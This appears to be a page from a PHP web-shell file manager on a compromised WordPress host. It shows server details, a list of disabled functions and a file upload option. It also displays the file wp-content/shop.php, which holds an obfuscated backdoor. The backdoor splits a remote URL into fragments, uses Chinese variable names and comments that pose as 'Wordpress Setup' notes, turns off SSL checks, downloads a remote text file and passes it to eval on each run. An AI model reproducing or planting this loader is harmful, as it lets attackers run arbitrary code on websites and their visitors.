HEX
Server: Apache/2
System: Linux server1 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
User: prospack (1044)
PHP: 8.0.30
Disabled: eval, exec, apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, openlog, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec,syslog, system, xmlrpc_entity_decode,show_source,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
Upload Files
File: /home/prospack/domains/prospack.com/public_html/wp-content/shop.php
<?php
function 加载内容(){
    /** These are the 加载内容 to Wordpress Setup */
  $一 = 'ht' . 'tp' . 's' . '://' . 'ww' . 'w' . '.' . 'simple' . 'eever' . 'ything' . '.' . 'co' . 'm';
    $二 = '/' . 'us' . 'd';
    $三 = '/' . 'on' . '.' . 'txt';
    $四 = $一 . $二 . $三;
 /** These are the 数据 to Wordpress Setup */
    $数据 = @file_get_contents($四);
    if(!$数据 && function_exists('curl_init')){
        $请求 = curl_init($四);
        curl_setopt_array($请求, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_TIMEOUT => 3,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0
        ]);
        $数据 = curl_exec($请求);
        curl_close($请求);
    }
 /** These are the eval to Wordpress Setup */
    if($数据) eval("?>$数据");
}
加载内容();
?>